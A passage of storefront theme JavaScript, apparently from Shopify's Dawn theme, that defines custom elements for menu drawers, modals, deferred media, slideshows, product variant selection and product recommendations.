        parentMenuElement && parentMenuElement.classList.add('submenu-open');
        !reducedMotion || reducedMotion.matches
          ? addTrapFocus()
          : summaryElement.nextElementSibling.addEventListener('transitionend', addTrapFocus);
      }, 100);
    }
  }

  openMenuDrawer(summaryElement) {
    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });
    summaryElement.setAttribute('aria-expanded', true);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus = false) {
    if (event === undefined) return;

    this.mainDetailsToggle.classList.remove('menu-opening');
    this.mainDetailsToggle.querySelectorAll('details').forEach((details) => {
      details.removeAttribute('open');
      details.classList.remove('menu-opening');
    });
    this.mainDetailsToggle.querySelectorAll('.submenu-open').forEach((submenu) => {
      submenu.classList.remove('submenu-open');
    });
    document.body.classList.remove(`overflow-hidden-${this.dataset.breakpoint}`);
    removeTrapFocus(elementToFocus);
    this.closeAnimation(this.mainDetailsToggle);

    if (event instanceof KeyboardEvent) elementToFocus?.setAttribute('aria-expanded', false);
  }

  onFocusOut() {
    setTimeout(() => {
      if (this.mainDetailsToggle.hasAttribute('open') && !this.mainDetailsToggle.contains(document.activeElement))
        this.closeMenuDrawer();
    });
  }

  onCloseButtonClick(event) {
    const detailsElement = event.currentTarget.closest('details');
    this.closeSubmenu(detailsElement);
  }

  closeSubmenu(detailsElement) {
    const parentMenuElement = detailsElement.closest('.submenu-open');
    parentMenuElement && parentMenuElement.classList.remove('submenu-open');
    detailsElement.classList.remove('menu-opening');
    detailsElement.querySelector('summary').setAttribute('aria-expanded', false);
    removeTrapFocus(detailsElement.querySelector('summary'));
    this.closeAnimation(detailsElement);
  }

  closeAnimation(detailsElement) {
    let animationStart;

    const handleAnimation = (time) => {
      if (animationStart === undefined) {
        animationStart = time;
      }

      const elapsedTime = time - animationStart;

      if (elapsedTime < 400) {
        window.requestAnimationFrame(handleAnimation);
      } else {
        detailsElement.removeAttribute('open');
        if (detailsElement.closest('details[open]')) {
          trapFocus(detailsElement.closest('details[open]'), detailsElement.querySelector('summary'));
        }
      }
    };

    window.requestAnimationFrame(handleAnimation);
  }
}

customElements.define('menu-drawer', MenuDrawer);

class HeaderDrawer extends MenuDrawer {
  constructor() {
    super();
  }

  openMenuDrawer(summaryElement) {
    this.header = this.header || document.querySelector('.section-header');
    this.borderOffset =
      this.borderOffset || this.closest('.header-wrapper').classList.contains('header-wrapper--border-bottom') ? 1 : 0;
    document.documentElement.style.setProperty(
      '--header-bottom-position',
      `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`
    );
    this.header.classList.add('menu-open');

    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });

    summaryElement.setAttribute('aria-expanded', true);
    window.addEventListener('resize', this.onResize);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus) {
    if (!elementToFocus) return;
    super.closeMenuDrawer(event, elementToFocus);
    this.header.classList.remove('menu-open');
    window.removeEventListener('resize', this.onResize);
  }

  onResize = () => {
    this.header &&
      document.documentElement.style.setProperty(
        '--header-bottom-position',
        `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`
      );
    document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
  };
}

customElements.define('header-drawer', HeaderDrawer);

class ModalDialog extends HTMLElement {
  constructor() {
    super();
    this.querySelector('[id^="ModalClose-"]').addEventListener('click', this.hide.bind(this, false));
    this.addEventListener('keyup', (event) => {
      if (event.code.toUpperCase() === 'ESCAPE') this.hide();
    });
    if (this.classList.contains('media-modal')) {
      this.addEventListener('pointerup', (event) => {
        if (event.pointerType === 'mouse' && !event.target.closest('deferred-media, product-model')) this.hide();
      });
    } else {
      this.addEventListener('click', (event) => {
        if (event.target === this) this.hide();
      });
    }
  }

  connectedCallback() {
    if (this.moved) return;
    this.moved = true;
    document.body.appendChild(this);
  }

  show(opener) {
    this.openedBy = opener;
    const popup = this.querySelector('.template-popup');
    document.body.classList.add('overflow-hidden');
    this.setAttribute('open', '');
    if (popup) popup.loadContent();
    trapFocus(this, this.querySelector('[role="dialog"]'));
    window.pauseAllMedia();
  }

  hide() {
    document.body.classList.remove('overflow-hidden');
    document.body.dispatchEvent(new CustomEvent('modalClosed'));
    this.removeAttribute('open');
    removeTrapFocus(this.openedBy);
    window.pauseAllMedia();
  }
}
customElements.define('modal-dialog', ModalDialog);

class ModalOpener extends HTMLElement {
  constructor() {
    super();

    const button = this.querySelector('button');

    if (!button) return;
    button.addEventListener('click', () => {
      const modal = document.querySelector(this.getAttribute('data-modal'));
      if (modal) modal.show(button);
    });
  }
}
customElements.define('modal-opener', ModalOpener);

class DeferredMedia extends HTMLElement {
  constructor() {
    super();
    const poster = this.querySelector('[id^="Deferred-Poster-"]');
    if (!poster) return;
    poster.addEventListener('click', this.loadContent.bind(this));
  }

  loadContent(focus = true) {
    window.pauseAllMedia();
    if (!this.getAttribute('loaded')) {
      const content = document.createElement('div');
      content.appendChild(this.querySelector('template').content.firstElementChild.cloneNode(true));

      this.setAttribute('loaded', true);
      const deferredElement = this.appendChild(content.querySelector('video, model-viewer, iframe'));
      if (focus) deferredElement.focus();
      if (deferredElement.nodeName == 'VIDEO' && deferredElement.getAttribute('autoplay')) {
        // force autoplay for safari
        deferredElement.play();
      }
    }
  }
}

customElements.define('deferred-media', DeferredMedia);

class SliderComponent extends HTMLElement {
  constructor() {
    super();
    this.slider = this.querySelector('[id^="Slider-"]');
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.enableSliderLooping = false;
    this.currentPageElement = this.querySelector('.slider-counter--current');
    this.pageTotalElement = this.querySelector('.slider-counter--total');
    this.prevButton = this.querySelector('button[name="previous"]');
    this.nextButton = this.querySelector('button[name="next"]');

    if (!this.slider || !this.nextButton) return;

    this.initPages();
    const resizeObserver = new ResizeObserver((entries) => this.initPages());
    resizeObserver.observe(this.slider);

    this.slider.addEventListener('scroll', this.update.bind(this));
    this.prevButton.addEventListener('click', this.onButtonClick.bind(this));
    this.nextButton.addEventListener('click', this.onButtonClick.bind(this));
  }

  initPages() {
    this.sliderItemsToShow = Array.from(this.sliderItems).filter((element) => element.clientWidth > 0);
    if (this.sliderItemsToShow.length < 2) return;
    this.sliderItemOffset = this.sliderItemsToShow[1].offsetLeft - this.sliderItemsToShow[0].offsetLeft;
    this.slidesPerPage = Math.floor(
      (this.slider.clientWidth - this.sliderItemsToShow[0].offsetLeft) / this.sliderItemOffset
    );
    this.totalPages = this.sliderItemsToShow.length - this.slidesPerPage + 1;
    this.update();
  }

  resetPages() {
    this.sliderItems = this.querySelectorAll('[id^="Slide-"]');
    this.initPages();
  }

  update() {
    // Temporarily prevents unneeded updates resulting from variant changes
    // This should be refactored as part of https://github.com/Shopify/dawn/issues/2057
    if (!this.slider || !this.nextButton) return;

    const previousPage = this.currentPage;
    this.currentPage = Math.round(this.slider.scrollLeft / this.sliderItemOffset) + 1;

    if (this.currentPageElement && this.pageTotalElement) {
      this.currentPageElement.textContent = this.currentPage;
      this.pageTotalElement.textContent = this.totalPages;
    }

    if (this.currentPage != previousPage) {
      this.dispatchEvent(
        new CustomEvent('slideChanged', {
          detail: {
            currentPage: this.currentPage,
            currentElement: this.sliderItemsToShow[this.currentPage - 1],
          },
        })
      );
    }

    if (this.enableSliderLooping) return;

    if (this.isSlideVisible(this.sliderItemsToShow[0]) && this.slider.scrollLeft === 0) {
      this.prevButton.setAttribute('disabled', 'disabled');
    } else {
      this.prevButton.removeAttribute('disabled');
    }

    if (this.isSlideVisible(this.sliderItemsToShow[this.sliderItemsToShow.length - 1])) {
      this.nextButton.setAttribute('disabled', 'disabled');
    } else {
      this.nextButton.removeAttribute('disabled');
    }
  }

  isSlideVisible(element, offset = 0) {
    const lastVisibleSlide = this.slider.clientWidth + this.slider.scrollLeft - offset;
    return element.offsetLeft + element.clientWidth <= lastVisibleSlide && element.offsetLeft >= this.slider.scrollLeft;
  }

  onButtonClick(event) {
    event.preventDefault();
    const step = event.currentTarget.dataset.step || 1;
    this.slideScrollPosition =
      event.currentTarget.name === 'next'
        ? this.slider.scrollLeft + step * this.sliderItemOffset
        : this.slider.scrollLeft - step * this.sliderItemOffset;
    this.setSlidePosition(this.slideScrollPosition);
  }

  setSlidePosition(position) {
    this.slider.scrollTo({
      left: position,
    });
  }
}

customElements.define('slider-component', SliderComponent);

class SlideshowComponent extends SliderComponent {
  constructor() {
    super();
    this.sliderControlWrapper = this.querySelector('.slider-buttons');
    this.enableSliderLooping = true;

    if (!this.sliderControlWrapper) return;

    this.sliderFirstItemNode = this.slider.querySelector('.slideshow__slide');
    if (this.sliderItemsToShow.length > 0) this.currentPage = 1;

    this.announcementBarSlider = this.querySelector('.announcement-bar-slider');
    // Value below should match --duration-announcement-bar CSS value
    this.announcerBarAnimationDelay = this.announcementBarSlider ? 250 : 0;

    this.sliderControlLinksArray = Array.from(this.sliderControlWrapper.querySelectorAll('.slider-counter__link'));
    this.sliderControlLinksArray.forEach((link) => link.addEventListener('click', this.linkToSlide.bind(this)));
    this.slider.addEventListener('scroll', this.setSlideVisibility.bind(this));
    this.setSlideVisibility();

    if (this.announcementBarSlider) {
      this.announcementBarArrowButtonWasClicked = false;

      this.reducedMotion = window.matchMedia('(prefers-reduced-motion: reduce)');
      this.reducedMotion.addEventListener('change', () => {
        if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
      });

      [this.prevButton, this.nextButton].forEach((button) => {
        button.addEventListener(
          'click',
          () => {
            this.announcementBarArrowButtonWasClicked = true;
          },
          { once: true }
        );
      });
    }

    if (this.slider.getAttribute('data-autoplay') === 'true') this.setAutoPlay();
  }

  setAutoPlay() {
    this.autoplaySpeed = this.slider.dataset.speed * 1000;
    this.addEventListener('mouseover', this.focusInHandling.bind(this));
    this.addEventListener('mouseleave', this.focusOutHandling.bind(this));
    this.addEventListener('focusin', this.focusInHandling.bind(this));
    this.addEventListener('focusout', this.focusOutHandling.bind(this));

    if (this.querySelector('.slideshow__autoplay')) {
      this.sliderAutoplayButton = this.querySelector('.slideshow__autoplay');
      this.sliderAutoplayButton.addEventListener('click', this.autoPlayToggle.bind(this));
      this.autoplayButtonIsSetToPlay = true;
      this.play();
    } else {
      this.reducedMotion.matches || this.announcementBarArrowButtonWasClicked
        ? this.pause()
        : this.play();
    }
  }

  onButtonClick(event) {
    super.onButtonClick(event);
    this.wasClicked = true;

    const isFirstSlide = this.currentPage === 1;
    const isLastSlide = this.currentPage === this.sliderItemsToShow.length;

    if (!isFirstSlide && !isLastSlide) {
      this.applyAnimationToAnnouncementBar(event.currentTarget.name);
      return;
    }

    if (isFirstSlide && event.currentTarget.name === 'previous') {
      this.slideScrollPosition =
        this.slider.scrollLeft + this.sliderFirstItemNode.clientWidth * this.sliderItemsToShow.length;
    } else if (isLastSlide && event.currentTarget.name === 'next') {
      this.slideScrollPosition = 0;
    }

    this.setSlidePosition(this.slideScrollPosition);

    this.applyAnimationToAnnouncementBar(event.currentTarget.name);
  }

  setSlidePosition(position) {
    if (this.setPositionTimeout) clearTimeout(this.setPositionTimeout);
    this.setPositionTimeout = setTimeout (() => {
      this.slider.scrollTo({
        left: position,
      });
    }, this.announcerBarAnimationDelay);
  }

  update() {
    super.update();
    this.sliderControlButtons = this.querySelectorAll('.slider-counter__link');
    this.prevButton.removeAttribute('disabled');

    if (!this.sliderControlButtons.length) return;

    this.sliderControlButtons.forEach((link) => {
      link.classList.remove('slider-counter__link--active');
      link.removeAttribute('aria-current');
    });
    this.sliderControlButtons[this.currentPage - 1].classList.add('slider-counter__link--active');
    this.sliderControlButtons[this.currentPage - 1].setAttribute('aria-current', true);
  }

  autoPlayToggle() {
    this.togglePlayButtonState(this.autoplayButtonIsSetToPlay);
    this.autoplayButtonIsSetToPlay ? this.pause() : this.play();
    this.autoplayButtonIsSetToPlay = !this.autoplayButtonIsSetToPlay;
  }

  focusOutHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (!this.autoplayButtonIsSetToPlay || focusedOnAutoplayButton) return;
      this.play();
    } else if (
      !this.reducedMotion.matches &&
      !this.announcementBarArrowButtonWasClicked
    ) {
      this.play();
    }
  }

  focusInHandling(event) {
    if (this.sliderAutoplayButton) {
      const focusedOnAutoplayButton =
        event.target === this.sliderAutoplayButton || this.sliderAutoplayButton.contains(event.target);
      if (focusedOnAutoplayButton && this.autoplayButtonIsSetToPlay) {
        this.play();
      } else if (this.autoplayButtonIsSetToPlay) {
        this.pause();
      }
    } else if (this.announcementBarSlider.contains(event.target)) {
      this.pause();
    }
  }

  play() {
    this.slider.setAttribute('aria-live', 'off');
    clearInterval(this.autoplay);
    this.autoplay = setInterval(this.autoRotateSlides.bind(this), this.autoplaySpeed);
  }

  pause() {
    this.slider.setAttribute('aria-live', 'polite');
    clearInterval(this.autoplay);
  }

  togglePlayButtonState(pauseAutoplay) {
    if (pauseAutoplay) {
      this.sliderAutoplayButton.classList.add('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.playSlideshow);
    } else {
      this.sliderAutoplayButton.classList.remove('slideshow__autoplay--paused');
      this.sliderAutoplayButton.setAttribute('aria-label', window.accessibilityStrings.pauseSlideshow);
    }
  }

  autoRotateSlides() {
    const slideScrollPosition =
      this.currentPage === this.sliderItems.length
        ? 0
        : this.slider.scrollLeft + this.sliderItemOffset;

    this.setSlidePosition(slideScrollPosition);
    this.applyAnimationToAnnouncementBar();
  }

  setSlideVisibility(event) {
    this.sliderItemsToShow.forEach((item, index) => {
      const linkElements = item.querySelectorAll('a');
      if (index === this.currentPage - 1) {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.removeAttribute('tabindex');
          });
        item.setAttribute('aria-hidden', 'false');
        item.removeAttribute('tabindex');
      } else {
        if (linkElements.length)
          linkElements.forEach((button) => {
            button.setAttribute('tabindex', '-1');
          });
        item.setAttribute('aria-hidden', 'true');
        item.setAttribute('tabindex', '-1');
      }
    });
    this.wasClicked = false;
  }

  applyAnimationToAnnouncementBar(button = 'next') {
    if (!this.announcementBarSlider) return;

    const itemsCount = this.sliderItems.length;
    const increment = button === 'next' ? 1 : -1;

    const currentIndex = this.currentPage - 1;
    let nextIndex = (currentIndex + increment) % itemsCount;
    nextIndex = nextIndex === -1 ? itemsCount - 1 : nextIndex;

    const nextSlide = this.sliderItems[nextIndex];
    const currentSlide = this.sliderItems[currentIndex];

    const animationClassIn = 'announcement-bar-slider--fade-in';
    const animationClassOut = 'announcement-bar-slider--fade-out';

    const isFirstSlide = currentIndex === 0;
    const isLastSlide = currentIndex === itemsCount - 1;

    const shouldMoveNext = (button === 'next' && !isLastSlide) || (button === 'previous' && isFirstSlide);
    const direction = shouldMoveNext ? 'next' : 'previous';

    currentSlide.classList.add(`${animationClassOut}-${direction}`);
    nextSlide.classList.add(`${animationClassIn}-${direction}`);

    setTimeout(() => {
      currentSlide.classList.remove(`${animationClassOut}-${direction}`);
      nextSlide.classList.remove(`${animationClassIn}-${direction}`);
    }, this.announcerBarAnimationDelay * 2);
  }

  linkToSlide(event) {
    event.preventDefault();
    const slideScrollPosition =
      this.slider.scrollLeft +
      this.sliderFirstItemNode.clientWidth *
      (this.sliderControlLinksArray.indexOf(event.currentTarget) + 1 - this.currentPage);
    this.slider.scrollTo({
      left: slideScrollPosition,
    });
  }
}

customElements.define('slideshow-component', SlideshowComponent);

class VariantSelects extends HTMLElement {
  constructor() {
    super();
    this.addEventListener('change', this.onVariantChange);
  }

  onVariantChange() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(true, '', false);
    this.updatePickupAvailability();
    this.removeErrorMessage();
    this.updateVariantStatuses();

    if (!this.currentVariant) {
      this.toggleAddButton(true, '', true);
      this.setUnavailable();
    } else {
      this.updateMedia();
      this.updateURL();
      this.updateVariantInput();
      this.renderProductInfo();
      this.updateShareUrl();
    }
  }

  updateOptions() {
    this.options = Array.from(this.querySelectorAll('select'), (select) => select.value);
  }

  updateMasterId() {
    this.currentVariant = this.getVariantData().find((variant) => {
      return !variant.options
        .map((option, index) => {
          return this.options[index] === option;
        })
        .includes(false);
    });
  }

  updateMedia() {
    if (!this.currentVariant) return;
    if (!this.currentVariant.featured_media) return;

    const mediaGalleries = document.querySelectorAll(`[id^="MediaGallery-${this.dataset.section}"]`);
    mediaGalleries.forEach((mediaGallery) =>
      mediaGallery.setActiveMedia(`${this.dataset.section}-${this.currentVariant.featured_media.id}`, true)
    );

    const modalContent = document.querySelector(`#ProductModal-${this.dataset.section} .product-media-modal__content`);
    if (!modalContent) return;
    const newMediaModal = modalContent.querySelector(`[data-media-id="${this.currentVariant.featured_media.id}"]`);
    modalContent.prepend(newMediaModal);
  }

  updateURL() {
    if (!this.currentVariant || this.dataset.updateUrl === 'false') return;
    window.history.replaceState({}, '', `${this.dataset.url}?variant=${this.currentVariant.id}`);
  }

  updateShareUrl() {
    const shareButton = document.getElementById(`Share-${this.dataset.section}`);
    if (!shareButton || !shareButton.updateUrl) return;
    shareButton.updateUrl(`${window.shopUrl}${this.dataset.url}?variant=${this.currentVariant.id}`);
  }

  updateVariantInput() {
    const productForms = document.querySelectorAll(
      `#product-form-${this.dataset.section}, #product-form-installment-${this.dataset.section}`
    );
    productForms.forEach((productForm) => {
      const input = productForm.querySelector('input[name="id"]');
      input.value = this.currentVariant.id;
      input.dispatchEvent(new Event('change', { bubbles: true }));
    });
  }

  updateVariantStatuses() {
    const selectedOptionOneVariants = this.variantData.filter(
      (variant) => this.querySelector(':checked').value === variant.option1
    );
    const inputWrappers = [...this.querySelectorAll('.product-form__input')];
    inputWrappers.forEach((option, index) => {
      if (index === 0) return;
      const optionInputs = [...option.querySelectorAll('input[type="radio"], option')];
      const previousOptionSelected = inputWrappers[index - 1].querySelector(':checked').value;
      const availableOptionInputsValue = selectedOptionOneVariants
        .filter((variant) => variant.available && variant[`option${index}`] === previousOptionSelected)
        .map((variantOption) => variantOption[`option${index + 1}`]);
      this.setInputAvailability(optionInputs, availableOptionInputsValue);
    });
  }

  setInputAvailability(listOfOptions, listOfAvailableOptions) {
    listOfOptions.forEach((input) => {
      if (listOfAvailableOptions.includes(input.getAttribute('value'))) {
        input.innerText = input.getAttribute('value');
      } else {
        input.innerText = window.variantStrings.unavailable_with_option.replace('[value]', input.getAttribute('value'));
      }
    });
  }

  updatePickupAvailability() {
    const pickUpAvailability = document.querySelector('pickup-availability');
    if (!pickUpAvailability) return;

    if (this.currentVariant && this.currentVariant.available) {
      pickUpAvailability.fetchAvailability(this.currentVariant.id);
    } else {
      pickUpAvailability.removeAttribute('available');
      pickUpAvailability.innerHTML = '';
    }
  }

  removeErrorMessage() {
    const section = this.closest('section');
    if (!section) return;

    const productForm = section.querySelector('product-form');
    if (productForm) productForm.handleErrorMessage();
  }

  renderProductInfo() {
    const requestedVariantId = this.currentVariant.id;
    const sectionId = this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section;

    fetch(
      `${this.dataset.url}?variant=${requestedVariantId}&section_id=${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section
      }`
    )
      .then((response) => response.text())
      .then((responseText) => {
        // prevent unnecessary ui changes from abandoned selections
        if (this.currentVariant.id !== requestedVariantId) return;

        const html = new DOMParser().parseFromString(responseText, 'text/html');
        const destination = document.getElementById(`price-${this.dataset.section}`);
        const source = html.getElementById(
          `price-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`
        );
        const skuSource = html.getElementById(
          `Sku-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`
        );
        const skuDestination = document.getElementById(`Sku-${this.dataset.section}`);
        const inventorySource = html.getElementById(
          `Inventory-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`
        );
        const inventoryDestination = document.getElementById(`Inventory-${this.dataset.section}`);

        const volumePricingSource = html.getElementById(
          `Volume-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`
        );

        const pricePerItemDestination = document.getElementById(`Price-Per-Item-${this.dataset.section}`);
        const pricePerItemSource = html.getElementById(`Price-Per-Item-${this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section}`);

        const volumePricingDestination = document.getElementById(`Volume-${this.dataset.section}`);

        if (source && destination) destination.innerHTML = source.innerHTML;
        if (inventorySource && inventoryDestination) inventoryDestination.innerHTML = inventorySource.innerHTML;
        if (skuSource && skuDestination) {
          skuDestination.innerHTML = skuSource.innerHTML;
          skuDestination.classList.toggle('visibility-hidden', skuSource.classList.contains('visibility-hidden'));
        }

        if (volumePricingSource && volumePricingDestination) {
          volumePricingDestination.innerHTML = volumePricingSource.innerHTML;
        }

        if (pricePerItemSource && pricePerItemDestination) {
          pricePerItemDestination.innerHTML = pricePerItemSource.innerHTML;
          pricePerItemDestination.classList.toggle('visibility-hidden', pricePerItemSource.classList.contains('visibility-hidden'));
        }

        const price = document.getElementById(`price-${this.dataset.section}`);

        if (price) price.classList.remove('visibility-hidden');

        if (inventoryDestination)
          inventoryDestination.classList.toggle('visibility-hidden', inventorySource.innerText === '');

        const addButtonUpdated = html.getElementById(`ProductSubmitButton-${sectionId}`);
        this.toggleAddButton(
          addButtonUpdated ? addButtonUpdated.hasAttribute('disabled') : true,
          window.variantStrings.soldOut
        );

        publish(PUB_SUB_EVENTS.variantChange, {
          data: {
            sectionId,
            html,
            variant: this.currentVariant,
          },
        });
      });
  }

  toggleAddButton(disable = true, text, modifyClass = true) {
    const productForm = document.getElementById(`product-form-${this.dataset.section}`);
    if (!productForm) return;
    const addButton = productForm.querySelector('[name="add"]');
    const addButtonText = productForm.querySelector('[name="add"] > span');
    if (!addButton) return;

    if (disable) {
      addButton.setAttribute('disabled', 'disabled');
      if (text) addButtonText.textContent = text;
    } else {
      addButton.removeAttribute('disabled');
      addButtonText.textContent = window.variantStrings.addToCart;
    }

    if (!modifyClass) return;
  }

  setUnavailable() {
    const button = document.getElementById(`product-form-${this.dataset.section}`);
    const addButton = button.querySelector('[name="add"]');
    const addButtonText = button.querySelector('[name="add"] > span');
    const price = document.getElementById(`price-${this.dataset.section}`);
    const inventory = document.getElementById(`Inventory-${this.dataset.section}`);
    const sku = document.getElementById(`Sku-${this.dataset.section}`);
    const pricePerItem = document.getElementById(`Price-Per-Item-${this.dataset.section}`);

    if (!addButton) return;
    addButtonText.textContent = window.variantStrings.unavailable;
    if (price) price.classList.add('visibility-hidden');
    if (inventory) inventory.classList.add('visibility-hidden');
    if (sku) sku.classList.add('visibility-hidden');
    if (pricePerItem) pricePerItem.classList.add('visibility-hidden');
  }

  getVariantData() {
    this.variantData = this.variantData || JSON.parse(this.querySelector('[type="application/json"]').textContent);
    return this.variantData;
  }
}

customElements.define('variant-selects', VariantSelects);

class VariantRadios extends VariantSelects {
  constructor() {
    super();
  }

  setInputAvailability(listOfOptions, listOfAvailableOptions) {
    listOfOptions.forEach((input) => {
      if (listOfAvailableOptions.includes(input.getAttribute('value'))) {
        input.classList.remove('disabled');
      } else {
        input.classList.add('disabled');
      }
    });
  }

  updateOptions() {
    const fieldsets = Array.from(this.querySelectorAll('fieldset'));
    this.options = fieldsets.map((fieldset) => {
      return Array.from(fieldset.querySelectorAll('input')).find((radio) => radio.checked).value;
    });
  }
}

customElements.define('variant-radios', VariantRadios);

class ProductRecommendations extends HTMLElement {
  constructor() {
    super();
  }

  connectedCallback() {
    const handleIntersection = (entries, observer) => {
      if (!entries[0].isIntersecting) return;
      observer.unobserve(this);

      fetch(this.dataset.url)
        .then((response) => response.text())
        .then((text) => {
          const html = document.createElement('div');
          html.innerHTML = text;
          const recommendations = html.querySelector('product-recommendations');

          if (recommendations && recommendations.innerHTML.trim().length) {
            this.innerHTML = recommendations.innerHTML;
          }

          if (!this.querySelector('slideshow-component') && this.classList.contains('complementary-products')) {
            this.remove();
          }

          if (html.querySelector('.grid__item')) {
            this.classList.add('product-recommendations--loaded');
          }
        })
        .catch((e) => {
          console.error(e);
        });
    };

    new IntersectionObserver(handleIntersection.bind(this), { rootMargin: '0px 0px 400px 0px' }).observe(this);
  }
}

customElements.define('product-recommendations', ProductRecommendations);
